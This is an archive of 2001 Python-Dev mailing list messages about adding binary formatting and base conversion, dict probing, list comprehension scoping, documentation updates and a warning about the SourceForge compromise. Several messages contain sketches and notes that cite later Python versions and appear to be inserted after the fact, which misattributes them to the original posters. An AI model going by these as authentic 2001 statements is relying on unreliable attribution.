From esr at thyrsus.com  Wed May 30 23:42:22 2001
From: esr at thyrsus.com (Eric S. Raymond)
Date: Wed, 30 May 2001 17:42:22 -0400
Subject: [Python-Dev] Re: [Patches] [ python-Patches-428326 ] Timer class for threading
In-Reply-To: <LNBBLJKPBEHFEDALKOLCGEHDKFAA.tim.one@home.com>; from tim.one@home.com on Wed, May 30, 2001 at 05:30:49PM -0400
References: <20010530131424.Y690@xs4all.nl> <LNBBLJKPBEHFEDALKOLCGEHDKFAA.tim.one@home.com>
Message-ID: <20010530174222.A1019@thyrsus.com>

Tim Peters <tim.one at home.com>:
> My position will be that nothing ships in the distribution unless copyright
> has been assigned to the PSF, or the contributor has agreed to give the PSF
> a non-exclusive irrevocable etc license to release their work under the PSF
> license du jour.  Fleshing out the second option so as to prevent abuse on
> either side is going to require significant effort ("what if the PSF goes
> away?", "what if the PSF changes its license to something I hate?", "what if
> I change my mind?", etc).
> 
> Unfortunately, significant effort takes significant time too, and nobody has
> started on this yet.

I think a PSF pledge to use only an OSI-certified license would address
some of these issues.  Write it into the bylaws if necessary.
-- 
		<a href="http://www.tuxedo.org/~esr/">Eric S. Raymond</a>

He that would make his own liberty secure must guard even his enemy from
oppression: for if he violates this duty, he establishes a precedent that
will reach unto himself.
	-- Thomas Paine


From esr at thyrsus.com  Wed May 30 23:44:57 2001
From: esr at thyrsus.com (Eric S. Raymond)
Date: Wed, 30 May 2001 17:44:57 -0400
Subject: [Python-Dev] %b format?
In-Reply-To: <3B15669A.43B70A44@lemburg.com>; from mal@lemburg.com on Wed, May 30, 2001 at 11:31:06PM +0200
References: <930BBCA4CEBBD411BE6500508BB3328F2E1D99@nsamcanms1.ca.baltimore.com> <20010530172838.A778@thyrsus.com> <3B15669A.43B70A44@lemburg.com>
Message-ID: <20010530174457.B1019@thyrsus.com>

M.-A. Lemburg <mal at lemburg.com>:
> > > I would like to add a "%b" format for converting
> > > numbers to binary format (1's and 0's).  I realize
> > > this isn't a C-ism, but it would be very useful for
> > > teaching purposes, as newcomers find 101101 a lot
> > > easier to understand than 0x2D.
> > 
> > +1.  Didactically pretty useful, and the additional code won't boost
> > global complexity much.
> 
> Good idea. The only question I have is: in which order will
> you print the 0s and 1s (MSB->LSB, LSB->MSB, little/big endian) ?
> 
> I am thinking of adding a bit field type to mxNumber and have
> the same problem there...

For *this* context, we clearly want mathematical notation; MSB to the left
and no byte-swapping.  After all we'd actually be printing numerals, not 
dumping a bitfield.
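A minimal sketch of that ordering for non-negative integers only. It prints the most significant bit first, as %x and %o already do for their digits. `to_binary` is a hypothetical helper, and the comparison uses the `"b"` format spec that later Python versions provide (an assumption about the reader's interpreter).

```python
def to_binary(n):
    """Render a non-negative int in binary, most significant bit first."""
    if n < 0:
        raise ValueError("this sketch handles non-negative ints only")
    if n == 0:
        return "0"
    bits = []
    while n:
        bits.append("01"[n & 1])   # peel off the least significant bit
        n >>= 1
    return "".join(reversed(bits))  # reverse so the MSB comes first

print(to_binary(0x2D))    # 101101
print(format(0x2D, "b"))  # 101101 (later Python's built-in spelling)
```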
-- 
		<a href="http://www.tuxedo.org/~esr/">Eric S. Raymond</a>

The people of the various provinces are strictly forbidden to have in their
possession any swords, short swords, bows, spears, firearms, or other types
of arms. The possession of unnecessary implements makes difficult the
collection of taxes and dues and tends to foment uprisings.
        -- Toyotomi Hideyoshi, dictator of Japan, August 1588


From barry at digicool.com  Wed May 30 23:49:22 2001
From: barry at digicool.com (Barry A. Warsaw)
Date: Wed, 30 May 2001 17:49:22 -0400
Subject: [Python-Dev] %b format?
References: <930BBCA4CEBBD411BE6500508BB3328F2E1D99@nsamcanms1.ca.baltimore.com>
Message-ID: <15125.27362.431144.886216@anthem.wooz.org>

>>>>> "GW" == Greg Wilson <Greg.Wilson at baltimore.com> writes:

    GW> I would like to add a "%b" format for converting numbers to
    GW> binary format (1's and 0's).

For completeness, wouldn't you also want a binary integer literal so
your students could write binary numbers in their code?  And what
about a binary() operator a la hex()?

-Barry


From tim.one at home.com  Wed May 30 23:50:31 2001
From: tim.one at home.com (Tim Peters)
Date: Wed, 30 May 2001 17:50:31 -0400
Subject: [Python-Dev] %b format?
In-Reply-To: <3B15669A.43B70A44@lemburg.com>
Message-ID: <LNBBLJKPBEHFEDALKOLCGEHFKFAA.tim.one@home.com>

[Greg Wilson]
> I would like to add a "%b" format for converting
> numbers to binary format (1's and 0's).

-0, due to compound lumpiness:  hex() is to %x is to __hex__ as oct() is to
%o is to __oct__ as nothing is to %b is to nothing.  In that respect it's
unfortunate that Python has distinct nb_oct and nb_hex slots in the
PyNumberMethods struct (as opposed to a single parameterized "convert to
base N string" method).

[MAL]
> Good idea. The only question I have is: in which order will
> you print the 0s and 1s (MSB->LSB, LSB->MSB, little/big endian) ?

I'm sure Greg has in mind only integers, in which case %x and %o already
give the only useful <wink> answer.


From fdrake at cj42289-a.reston1.va.home.com  Wed May 30 23:51:22 2001
From: fdrake at cj42289-a.reston1.va.home.com (Fred Drake)
Date: Wed, 30 May 2001 17:51:22 -0400 (EDT)
Subject: [Python-Dev] [development doc updates]
Message-ID: <20010530215122.3738C28849@cj42289-a.reston1.va.home.com>

The development version of the documentation has been updated:

    http://python.sourceforge.net/devel-docs/

Update for development version of Python (2.2).

This update substantially re-works the prototype support for
productions of a formal grammar.  They look better, support forward
references to symbol definitions, and allow download of an all-text
version of the complete grammar (with productions ordered the same way
as they are in the documentation sources).

"Documenting Python" now includes documentation for the LaTeX markup
used to describe productions:

    http://python.sourceforge.net/devel-docs/doc/grammar-displays.html


From esr at thyrsus.com  Thu May 31 00:05:09 2001
From: esr at thyrsus.com (Eric S. Raymond)
Date: Wed, 30 May 2001 18:05:09 -0400
Subject: [Python-Dev] %b format?
In-Reply-To: <LNBBLJKPBEHFEDALKOLCGEHFKFAA.tim.one@home.com>; from tim.one@home.com on Wed, May 30, 2001 at 05:50:31PM -0400
References: <3B15669A.43B70A44@lemburg.com> <LNBBLJKPBEHFEDALKOLCGEHFKFAA.tim.one@home.com>
Message-ID: <20010530180509.B1305@thyrsus.com>

Tim Peters <tim.one at home.com>:
> -0, due to compound lumpiness:  hex() is to %x is to __hex__ as oct() is to
> %o is to __oct__ as nothing is to %b is to nothing.  In that respect it's
> unfortunate that Python has distinct nb_oct and nb_hex slots in the
> PyNumberMethods struct (as opposed to a single parameterized "convert to
> base N string" method).

Is the right answer to add the convert-to-base slot and deprecate the
other two?
-- 
		<a href="http://www.tuxedo.org/~esr/">Eric S. Raymond</a>

If gun laws in fact worked, the sponsors of this type of legislation
should have no difficulty drawing upon long lists of examples of
criminal acts reduced by such legislation. That they cannot do so
after a century and a half of trying -- that they must sweep under the
rug the southern attempts at gun control in the 1870-1910 period, the
northeastern attempts in the 1920-1939 period, the attempts at both
Federal and State levels in 1965-1976 -- establishes the repeated,
complete and inevitable failure of gun laws to control serious crime.
        -- Senator Orrin Hatch, in a 1982 Senate Report


From fdrake at acm.org  Thu May 31 00:00:15 2001
From: fdrake at acm.org (Fred L. Drake, Jr.)
Date: Wed, 30 May 2001 18:00:15 -0400 (EDT)
Subject: [Python-Dev] Most recent documentation update
Message-ID: <15125.28015.611763.968854@cj42289-a.reston1.va.home.com>

  One thing I forgot to mention in my announcement of the update to
the development documentation which I just posted is that I went ahead
and converted all but one of the productions in the Reference Manual
to the new markup.  The print_stmt production, unfortunately, is given
twice instead of using a single model for the statement.  The
formatting tools don't support that (yet), and it's not clear that
they should.
  (No, Barry, don't go changing it...!)


  -Fred

-- 
Fred L. Drake, Jr.  <fdrake at acm.org>
PythonLabs at Digital Creations


From esr at thyrsus.com  Thu May 31 00:03:41 2001
From: esr at thyrsus.com (Eric S. Raymond)
Date: Wed, 30 May 2001 18:03:41 -0400
Subject: [Python-Dev] %b format?
In-Reply-To: <15125.27362.431144.886216@anthem.wooz.org>; from barry@digicool.com on Wed, May 30, 2001 at 05:49:22PM -0400
References: <930BBCA4CEBBD411BE6500508BB3328F2E1D99@nsamcanms1.ca.baltimore.com> <15125.27362.431144.886216@anthem.wooz.org>
Message-ID: <20010530180341.A1305@thyrsus.com>

Barry A. Warsaw <barry at digicool.com>:
> 
> >>>>> "GW" == Greg Wilson <Greg.Wilson at baltimore.com> writes:
> 
>     GW> I would like to add a "%b" format for converting numbers to
>     GW> binary format (1's and 0's).
> 
> For completeness, wouldn't you also want a binary integer literal so
> your students could write binary numbers in their code?  And what
> about a binary() operator a la hex()?

Barry is correct.  If we're going to do this, we ought to do it right and
support binary on a par with decimal, hex, and octal.  I favor this.
-- 
		<a href="http://www.tuxedo.org/~esr/">Eric S. Raymond</a>

The direct use of physical force is so poor a solution to the problem of
limited resources that it is commonly employed only by small children and
great nations.
	-- David Friedman


From barry at digicool.com  Thu May 31 00:05:37 2001
From: barry at digicool.com (Barry A. Warsaw)
Date: Wed, 30 May 2001 18:05:37 -0400
Subject: [Python-Dev] Most recent documentation update
References: <15125.28015.611763.968854@cj42289-a.reston1.va.home.com>
Message-ID: <15125.28337.938136.505675@anthem.wooz.org>

>>>>> "Fred" == Fred L Drake, Jr <fdrake at acm.org> writes:

    Fred> (No, Barry, don't go changing it...!)

Oh darn, three whole days work wasted...

:)


From tim.one at home.com  Thu May 31 00:17:42 2001
From: tim.one at home.com (Tim Peters)
Date: Wed, 30 May 2001 18:17:42 -0400
Subject: [Python-Dev] %b format?
In-Reply-To: <15125.27362.431144.886216@anthem.wooz.org>
Message-ID: <LNBBLJKPBEHFEDALKOLCKEHIKFAA.tim.one@home.com>

Note that in Vyper (John Skaller's Python variant) these are legit integer
literals:

0b11111111 0B11111111
0o777      0O777
0d999      0D999
0xfFf      0XFFf

Vyper's octal notation is still ugly, but whoever first thought

    0777 != 777

was a "good idea" was certifiably insane <0.25 wink>.
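For comparison, here is a sketch of how this later played out. This goes beyond the thread: Python 3 adopted the `0b` and `0o` prefixes (PEP 3127) and made `0777` a syntax error, but it has no `0d` prefix. Run it under Python 3; `LITERALS` and `leading_zero_rejected` are illustrative names only.

```python
# Python 3 spellings of the Vyper-style literals quoted above.
LITERALS = {
    "0b11111111": 0b11111111,
    "0B11111111": 0B11111111,
    "0o777": 0o777,
    "0O777": 0O777,
    "0xfFf": 0xfFf,
    "0XFFf": 0XFFf,
}

def leading_zero_rejected(src):
    """True if Python 3 refuses `src` as an expression (e.g. "0777")."""
    try:
        compile(src, "<literal>", "eval")
    except SyntaxError:
        return True
    return False

for text, value in LITERALS.items():
    print(text, "==", value)
print(leading_zero_rejected("0777"))  # True
```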


From tim.one at home.com  Thu May 31 00:29:33 2001
From: tim.one at home.com (Tim Peters)
Date: Wed, 30 May 2001 18:29:33 -0400
Subject: [Python-Dev] %b format?
In-Reply-To: <20010530180509.B1305@thyrsus.com>
Message-ID: <LNBBLJKPBEHFEDALKOLCIEHJKFAA.tim.one@home.com>

[Eric S. Raymond]
> Is the right answer to add the convert-to-base slot and deprecate the
> other two?

That would fix "the other" lump here in Python, that e.g.

>>> int("111", 3)
13
>>>

has no inverse.  string->int is happy with any base in 2..36 inclusive, but
int->string is spelled via 3 different builtins covering only 3 of those
bases.
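A sketch of the missing inverse, written as a plain Python function rather than the type slot under discussion (an assumption made for illustration). `to_base` and `DIGITS` are hypothetical names, and the digit alphabet is the one `int()` accepts for bases up to 36.

```python
DIGITS = "0123456789abcdefghijklmnopqrstuvwxyz"

def to_base(n, base):
    """Inverse of int(s, base) for 2 <= base <= 36 (hypothetical helper)."""
    if not 2 <= base <= 36:
        raise ValueError("base must be in 2..36")
    if n == 0:
        return "0"
    sign = "-" if n < 0 else ""
    n = abs(n)
    out = []
    while n:
        n, r = divmod(n, base)  # r is the next least significant digit
        out.append(DIGITS[r])
    return sign + "".join(reversed(out))

print(to_base(13, 3))          # 111
print(int(to_base(13, 3), 3))  # 13
```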

It would be more *expedient* to add "just" a __bin__/nb_bin method + a way
to spell binary int literals + a %b format + a bin() builtin.

On the fifth hand, I doubt anyone would want to add new % format codes for
bases {2..36} - {2, 8, 10, 16}.

So it will remain lumpy no matter what.  I look forward to the PEP <wink>.


From esr at thyrsus.com  Thu May 31 00:38:33 2001
From: esr at thyrsus.com (Eric S. Raymond)
Date: Wed, 30 May 2001 18:38:33 -0400
Subject: [Python-Dev] %b format?
In-Reply-To: <LNBBLJKPBEHFEDALKOLCKEHIKFAA.tim.one@home.com>; from tim.one@home.com on Wed, May 30, 2001 at 06:17:42PM -0400
References: <15125.27362.431144.886216@anthem.wooz.org> <LNBBLJKPBEHFEDALKOLCKEHIKFAA.tim.one@home.com>
Message-ID: <20010530183833.B1654@thyrsus.com>

Tim Peters <tim.one at home.com>:
> Vyper's octal notation is still ugly, but whoever first thought
> 
>     0777 != 777
> 
> was a "good idea" was certifiably insane <0.25 wink>.

For anyone who doesn't know the history behind this...  

The 0xxx notation was copied from PDP-11 assembler literals -- the
instruction-set design of the PDP-11 was such that most of the
instruction subfields fit in octal digits, so this convention made it
somewhat easier to read machine-code dumps.

While I'm at it, I should note that the design of the 11 was ancestral
to both the 8088 and 68000 microprocessors, and thus to essentially 
every new general-purpose computer designed in the last fifteen years.
-- 
		<a href="http://www.tuxedo.org/~esr/">Eric S. Raymond</a>

"Are we to understand," asked the judge, "that you hold your own interests
above the interests of the public?"

"I hold that such a question can never arise except in a society of cannibals."
	-- Ayn Rand


From esr at thyrsus.com  Thu May 31 00:39:43 2001
From: esr at thyrsus.com (Eric S. Raymond)
Date: Wed, 30 May 2001 18:39:43 -0400
Subject: [Python-Dev] %b format?
In-Reply-To: <LNBBLJKPBEHFEDALKOLCIEHJKFAA.tim.one@home.com>; from tim.one@home.com on Wed, May 30, 2001 at 06:29:33PM -0400
References: <20010530180509.B1305@thyrsus.com> <LNBBLJKPBEHFEDALKOLCIEHJKFAA.tim.one@home.com>
Message-ID: <20010530183943.C1654@thyrsus.com>

Tim Peters <tim.one at home.com>:
> [Eric S. Raymond]
> > Is the right answer to add the convert-to-base slot and deprecate the
> > other two?
> 
> That would fix "the other" lump here in Python, that e.g.
> 
> >>> int("111", 3)
> 13
> >>>
> 
> has no inverse.  string->int is happy with any base in 2..36 inclusive, but
> int->string is spelled via 3 different builtins covering only 3 of those
> bases.

That sounds like a strong argument to me.  
-- 
		<a href="http://www.tuxedo.org/~esr/">Eric S. Raymond</a>

The world is filled with violence. Because criminals carry guns, we
decent law-abiding citizens should also have guns. Otherwise they will
win and the decent people will lose.
        -- James Earl Jones


From nas at python.ca  Thu May 31 00:38:58 2001
From: nas at python.ca (Neil Schemenauer)
Date: Wed, 30 May 2001 15:38:58 -0700
Subject: [Python-Dev] %b format?
In-Reply-To: <LNBBLJKPBEHFEDALKOLCKEHIKFAA.tim.one@home.com>; from tim.one@home.com on Wed, May 30, 2001 at 06:17:42PM -0400
References: <15125.27362.431144.886216@anthem.wooz.org> <LNBBLJKPBEHFEDALKOLCKEHIKFAA.tim.one@home.com>
Message-ID: <20010530153858.A21901@glacier.fnational.com>

Tim Peters wrote:
> Vyper's octal notation is still ugly, but whoever first thought
> 
>     0777 != 777
> 
> was a "good idea" was certifiably insane <0.25 wink>.

Ever used MacLisp or ZetaLisp?  There:

    777 == 0d511

If only we had been born with 8 or 16 fingers, right?

  Neil


From thomas at xs4all.net  Thu May 31 03:52:48 2001
From: thomas at xs4all.net (Thomas Wouters)
Date: Thu, 31 May 2001 03:52:48 +0200
Subject: [Python-Dev] SF hacked
Message-ID: <20010531035248.G690@xs4all.nl>

It *seems*, from this site:

http://66.92.75.28/~vladimir/themes-org.html

that SourceForge has been hacked, and more seriously than SF first admits
(if I'm to believe the arrogant spouting of some script-kiddie, anyway. :)
And the same goes for apache.org, it looks like. Anyway, if anyone connected
*from* any of sourceforge's machines to anywhere else, in the last couple of
months, they'll be well advised to change their passwords and check for
intruders. The same goes if you connect through ssh and (foolishly ;)
allowed ssh-agent-forwarding to the SF machines. In that case, better check
all the machines that ssh-agent would give you unpassworded access to for
logins you don't recognize. The site above lists a number of sniffed
passwords, in case you want to check, but there's no reason for the hacker
not to have even more sniffed passwords lying about :)

And if you have a login on apache.org, you probably want to change your
password in any case.... the above listed site has what seems to be a copy
of the shadow password file.

-- 
Thomas Wouters <thomas at xs4all.net>

Hi! I'm a .signature virus! copy me into your .signature file to help me spread!


From tim.one at home.com  Thu May 31 05:53:53 2001
From: tim.one at home.com (Tim Peters)
Date: Wed, 30 May 2001 23:53:53 -0400
Subject: [Python-Dev] One more dict trick
Message-ID: <LNBBLJKPBEHFEDALKOLCGEIFKFAA.tim.one@home.com>

If anyone has an app known or suspected to be sensitive to dict timing,
please try the patch here.  Best I've been able to tell, it's a win.  But
it's a radical change in approach, so I don't want to rush it.

This gets rid of the polynomial machinery entirely, along with the branches
associated with updating the things, and the dictobject struct member
holding the table's poly.  Instead it relies on that

    i = (5*i + 1) % n

is a full-period RNG whenever n is a power of 2 (that's what guarantees it
will visit every slot), but perturbs that by adding in a few bits from the
full hash code shifted right each time (that's what guarantees every bit of
the hash code eventually influences the probe sequence, avoiding simple
quadratic-time degenerate cases).
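A minimal sketch of the two claims above, under stated assumptions: the function names, the shift amount of 5, and the exact way `perturb` is folded in are illustrative choices, not necessarily what the attached patch does. The first function shows that `i = (5*i + 1) % n` reaches every slot when `n` is a power of 2 (and not otherwise); the second shows two hashes that collide in the low bits but diverge once higher hash bits are mixed in.

```python
def full_period_probe(n, start=0):
    """Slots visited by i = (5*i + 1) % n until a slot repeats."""
    order, seen = [], set()
    i = start % n
    while i not in seen:
        seen.add(i)
        order.append(i)
        i = (5 * i + 1) % n
    return order


def perturbed_probe(hash_code, n, steps, shift=5):
    """First `steps` slots of a perturbed probe sequence (illustrative only).

    Assumes n is a power of 2 and hash_code is non-negative. Each step
    shifts `perturb` right so higher hash bits gradually enter the index.
    """
    mask = n - 1
    i = hash_code & mask
    perturb = hash_code
    slots = [i]
    for _ in range(steps - 1):
        perturb >>= shift
        i = (5 * i + perturb + 1) & mask
        slots.append(i)
    return slots


print(full_period_probe(8))   # [0, 1, 6, 7, 4, 5, 2, 3]: every slot
print(full_period_probe(6))   # [0, 1]: n not a power of 2, cycle is short
# 5 and 37 share their low 3 bits, so both start in slot 5 of an
# 8-slot table, but the perturbation separates them on the next probe.
print(perturbed_probe(5, 8, 4), perturbed_probe(37, 8, 4))
```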
-------------- next part --------------
An embedded and charset-unspecified text was scrubbed...
Name: dict.txt
URL: <http://mail.python.org/pipermail/python-dev/attachments/20010530/11ef83d8/attachment-0001.txt>

From tim.one at home.com  Thu May 31 06:46:56 2001
From: tim.one at home.com (Tim Peters)
Date: Thu, 31 May 2001 00:46:56 -0400
Subject: [Python-Dev] %b format?
In-Reply-To: <20010530183833.B1654@thyrsus.com>
Message-ID: <LNBBLJKPBEHFEDALKOLCIEIHKFAA.tim.one@home.com>

[ESR]
> The 0xxx notation was copied from PDP-11 assembler literals -- the
> instruction-set design of the PDP-11 was such that most of the
> instruction subfields fit in octal digits, so this convention made it
> somewhat easier to read machine-code dumps.

That doesn't mean they weren't certifiably insane.  At Cray, we had a much
more sensible convention:  *all* numbers were octal (yes, it was a 64-bit
box and octal didn't make any sense, but Seymour Cray got used to it from
the 60-bit CDC w/ 18-bit address registers and didn't feel like changing).
My first boss there loved telling the story about how he was out for a drive
with the family, and excitedly screamed "Hey, kids!  Look!  The odometer is
just about to change to 40,000!".  Of course it read 37,777.9 at the time,
and they thought he was nuts.  That's where this kind of thing always leads
in the end.

to-disgrace-despair-and-eventually-ruin-ly y'rs  - tim


From tim.one at home.com  Thu May 31 06:48:28 2001
From: tim.one at home.com (Tim Peters)
Date: Thu, 31 May 2001 00:48:28 -0400
Subject: [Python-Dev] %b format?
In-Reply-To: <20010530153858.A21901@glacier.fnational.com>
Message-ID: <LNBBLJKPBEHFEDALKOLCMEIHKFAA.tim.one@home.com>

[Neil Schemenauer]
> Ever used MacLisp or ZetaLisp?  There:
>
>     777 == 0d511
>
> If only we had been born with 8 or 16 fingers, right?

Then guys would probably be attracted to base 9 or 17.

sorry-for-that-but-i-felt-it-was-expected-of-me-ly y'rs  - tim


From greg at cosc.canterbury.ac.nz  Thu May 31 07:15:24 2001
From: greg at cosc.canterbury.ac.nz (Greg Ewing)
Date: Thu, 31 May 2001 17:15:24 +1200 (NZST)
Subject: [Python-Dev] scoping and list comprehensions
In-Reply-To: <15125.23727.168431.762320@beluga.mojam.com>
Message-ID: <200105310515.RAA01757@s454.cosc.canterbury.ac.nz>

Skip:

>    scope:
>        l = [i**2 for i in range(10)]

By analogy with C, the introducer of a new scope should
simply be an unadorned colon:

  :
    l = [i**2 for i in range(10)]

:-)

While this might be useful, it doesn't really address the issue
raised, because we really need a new scope per listcomp (or
maybe even each 'for' in the listcomp).

> There's also the problem of how to export results from the scope, though
> perhaps the new nested scope stuff provides a solution to that.

Nope -- there's still no way to assign to any name in
an intermediate scope. Something heretical, such as
declarations, would be needed.
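Python 3 did eventually add exactly such a declaration: the `nonlocal` statement (PEP 3104) lets a nested function rebind a name in an enclosing function scope. A minimal sketch, with `make_counter` as a made-up example:

```python
def make_counter():
    count = 0

    def bump():
        # Without this declaration, "count += 1" would make count local
        # to bump() and raise UnboundLocalError on the first call.
        nonlocal count
        count += 1
        return count

    return bump


counter = make_counter()
counter()
counter()
print(counter())  # 3
```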

Greg Ewing, Computer Science Dept, +--------------------------------------+
University of Canterbury,	   | A citizen of NewZealandCorp, a	  |
Christchurch, New Zealand	   | wholly-owned subsidiary of USA Inc.  |
greg at cosc.canterbury.ac.nz	   +--------------------------------------+


From greg at cosc.canterbury.ac.nz  Thu May 31 07:16:11 2001
From: greg at cosc.canterbury.ac.nz (Greg Ewing)
Date: Thu, 31 May 2001 17:16:11 +1200 (NZST)
Subject: [Python-Dev] Iteration variables and list comprehensions
In-Reply-To: <LNBBLJKPBEHFEDALKOLCAEGOKFAA.tim.one@home.com>
Message-ID: <200105310516.RAA01760@s454.cosc.canterbury.ac.nz>

Tim:

> >>> base3 = [x[:] for x[0] in digits for x[1] in digits for x[2] in
>              digits]

Yikes! That would be clearer as

  [[x,y,z] for x in digits for y in digits for z in digits]

I'll concede it's nowhere near as much fun, though...
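A sketch checking that Greg's rewrite builds the same list as Tim's. The definitions of `digits` and the three-element list `x` are assumptions, since the quoted snippet does not show them; Greg's loop names are renamed to `a, b, c` so they do not clash with `x`. Tim's version works because a comprehension's `for` target may be any assignment target, including a subscription such as `x[0]`.

```python
digits = [0, 1, 2]   # assumed: the base-3 digits
x = [None] * 3       # assumed: pre-existing list used as the loop target

# Tim's version: each "for" assigns into a slot of x; x[:] snapshots it.
tims = [x[:] for x[0] in digits for x[1] in digits for x[2] in digits]

# Greg's version: plain loop variables, one new list per combination.
gregs = [[a, b, c] for a in digits for b in digits for c in digits]

print(tims == gregs, len(gregs))  # True 27
```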



From greg at cosc.canterbury.ac.nz  Thu May 31 07:16:41 2001
From: greg at cosc.canterbury.ac.nz (Greg Ewing)
Date: Thu, 31 May 2001 17:16:41 +1200 (NZST)
Subject: [Python-Dev] Iteration variables and list comprehensions
In-Reply-To: <LNBBLJKPBEHFEDALKOLCEEGPKFAA.tim.one@home.com>
Message-ID: <200105310516.RAA01763@s454.cosc.canterbury.ac.nz>

Tim:

> Needs a PEP, and possibly
> even an associated future-statement.  Overall, I'm more in favor of changing
> it than not.

If we do this, we also need to consider whether we want
to make the corresponding change to regular for-loops.
Seems to me that all the reasons it's a good idea for
listcomps apply to for-loops as well.

Another advantage of changing both together is that
we can continue to describe listcomp semantics in terms
of for-loops instead of lambdas. Then we won't have to go 
into hiding until Guido dies or lifts the fatwah against
us.



From greg at cosc.canterbury.ac.nz  Thu May 31 07:17:16 2001
From: greg at cosc.canterbury.ac.nz (Greg Ewing)
Date: Thu, 31 May 2001 17:17:16 +1200 (NZST)
Subject: [Python-Dev] %b format?
In-Reply-To: <LNBBLJKPBEHFEDALKOLCIEHJKFAA.tim.one@home.com>
Message-ID: <200105310517.RAA01766@s454.cosc.canterbury.ac.nz>

Tim:

> On the fifth hand, I doubt anyone would want to add new % format codes for
> bases {2..36} - {2, 8, 10, 16}.

So, just add one general one:

  %m.nb

with n being the base. If n defaults to 2, you can read the "b"
as either "base" or "binary".

Literals:

  0b(5)21403       general
  0b11001101       binary

Conversion functions:

  base(x, n)       general
  bin(x)           equivalent to base(x, 2) (for symmetry with
                                             existing hex, oct)

Type slots:

  __base__(x, n)

Backwards compatibility measures:

  hex(x) --> base(x, 16)
  oct(x) --> base(x, 8)
  bin(x) --> base(x, 2)

  base(x, n) checks __hex__ and __oct__ slots for special cases
             of n=16 and n=8, falls back on __base__

There, that takes care of integers. Anyone want to do the
equivalent for floats ?-)
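A sketch of what the proposed general conversion function might do. `base` is hypothetical (no such builtin exists); the digit alphabet 0-9a-z is an assumption matching the bases 2..36 that `int()` accepts. The reverse direction already exists as `int(s, n)`, which can evaluate the example literal `0b(5)21403` from its digit string.

```python
import string

DIGITS = string.digits + string.ascii_lowercase  # 36 symbols: 0-9, a-z


def base(x, n):
    """Hypothetical: format integer x in base n (2 <= n <= 36)."""
    if not 2 <= n <= 36:
        raise ValueError("base must be in 2..36")
    if x == 0:
        return "0"
    sign = "-" if x < 0 else ""
    x = abs(x)
    out = []
    while x:
        x, r = divmod(x, n)   # peel off the least significant digit
        out.append(DIGITS[r])
    return sign + "".join(reversed(out))


print(base(205, 2))            # 11001101
print(base(255, 16))           # ff
print(int("21403", 5))         # 1478, the value of 0b(5)21403
print(int(base(1478, 5), 5))   # 1478, round trip through base 5
```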



From esr at thyrsus.com  Thu May 31 08:01:54 2001
From: esr at thyrsus.com (Eric S. Raymond)
Date: Thu, 31 May 2001 02:01:54 -0400
Subject: [Python-Dev] %b format?
In-Reply-To: <200105310517.RAA01766@s454.cosc.canterbury.ac.nz>; from greg@cosc.canterbury.ac.nz on Thu, May 31, 2001 at 05:17:16PM +1200
References: <LNBBLJKPBEHFEDALKOLCIEHJKFAA.tim.one@home.com> <200105310517.RAA01766@s454.cosc.canterbury.ac.nz>
Message-ID: <20010531020154.A4404@thyrsus.com>

Greg Ewing <greg at cosc.canterbury.ac.nz>:
> So, just add one general one:
> 
>   %m.nb
> 
> with n being the base. If n defaults to 2, you can read the "b"
> as either "base" or "binary".

I had a similar idea, but your version is more elegant.
-- 
		<a href="http://www.tuxedo.org/~esr/">Eric S. Raymond</a>

The common argument that crime is caused by poverty is a kind of
slander on the poor.
	-- H. L. Mencken


From tim_one at email.msn.com  Thu May 31 08:20:21 2001
From: tim_one at email.msn.com (Tim Peters)
Date: Thu, 31 May 2001 02:20:21 -0400
Subject: [Python-Dev] Iteration variables and list comprehensions
In-Reply-To: <200105310516.RAA01763@s454.cosc.canterbury.ac.nz>
Message-ID: <LNBBLJKPBEHFEDALKOLCIEIOKFAA.tim_one@email.msn.com>

[Greg Ewing]
> If we do this, we also need to consider whether we want
> to make the corresponding change to regular for-loops.
> Seems to me that all the reasons it's a good idea for
> listcomps apply to for-loops as well.

I expect there's no chance:  unlike listcomps, for-loops allow break
statements, and search loops that use the for index after a break (and out
of the loop!) are common.

> Another advantage of changing both together is that
> we can continue to describe listcomp semantics in terms
> of for-loops

But I'm afraid that's also an advantage of leaving both alone.

> instead of lambdas.
>
> Then we won't have to go into hiding until Guido dies or lifts
> the fatwah against us.

Death won't stop him -- he's Dutch <wink>.


From tim_one at email.msn.com  Thu May 31 08:28:04 2001
From: tim_one at email.msn.com (Tim Peters)
Date: Thu, 31 May 2001 02:28:04 -0400
Subject: [Python-Dev] %b format?
In-Reply-To: <200105310517.RAA01766@s454.cosc.canterbury.ac.nz>
Message-ID: <LNBBLJKPBEHFEDALKOLCAEIPKFAA.tim_one@email.msn.com>

[Greg Ewing]
> So, just add one general one:
>
>   %m.nb
>
> with n being the base. If n defaults to 2, you can read the "b"
> as either "base" or "binary".

Except .n has a different meaning already for integer conversions:

>>> "%.5d" % 2
'00002'
>>> "%.10o" % 377
'0000000571'
>>>

It would be inconsistent to hijack it to mean something else here.

> Literals:
>
>   0b(5)21403       general

I've actually got no use for bases outside {2, 8, 10, 16}, and have never
heard a request for them either, so I'd be at best -0.  Better to stop
documenting the full truth about int() <0.9 wink>.

>   0b11001101       binary

+1.

> Conversion functions:
>
>   base(x, n)       general

-0, as above.

>   bin(x)           equivalent to base(x, 2) (for symmetry with
>                                              existing hex, oct)

+1 if binary literals are added.

> Type slots:
>
>   __base__(x, n)

Given the tenor of the above, add __bin__ and call it a day.
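For comparison, Python 2.6 and 3.0 later adopted roughly the subset endorsed here (PEP 3127): `0b` binary literals, a `bin()` builtin, and a `b` code for `format()`. No `__bin__` slot was added; in Python 3, `bin()`, `hex()` and `oct()` all go through `__index__`. The `Flags` class below is a made-up example.

```python
class Flags:
    """Hypothetical int-like class; bin() only needs __index__."""

    def __init__(self, value):
        self.value = value

    def __index__(self):
        return self.value


assert 0b11001101 == 205                     # binary literal
assert bin(205) == "0b11001101"              # conversion function
assert format(205, "b") == "11001101"        # format code, no prefix
assert format(205, "#010b") == "0b11001101"  # prefixed, width 10
assert bin(Flags(5)) == "0b101"              # __index__ is the hook
assert "%.5d" % 2 == "00002"                 # .n is still precision here
print(bin(205), format(5, "08b"))            # 0b11001101 00000101
```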

> Backwards compatibility measures:
>
>   hex(x) --> base(x, 16)
>   oct(x) --> base(x, 8)
>   bin(x) --> base(x, 2)
>
>   base(x, n) checks __hex__ and __oct__ slots for special cases
>              of n=16 and n=8, falls back on __base__
>
> There, that takes care of integers. Anyone want to do the
> equivalent for floats ?-)

Note that C99 introduces a hex notation for floats.
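Python later exposed the C99 hexadecimal float format through `float.hex()` and `float.fromhex()` (new in Python 2.6). A short sketch of why it is useful: it round-trips exactly, with no decimal rounding.

```python
x = 3.0
s = x.hex()                      # '0x1.8000000000000p+1', i.e. 1.5 * 2**1
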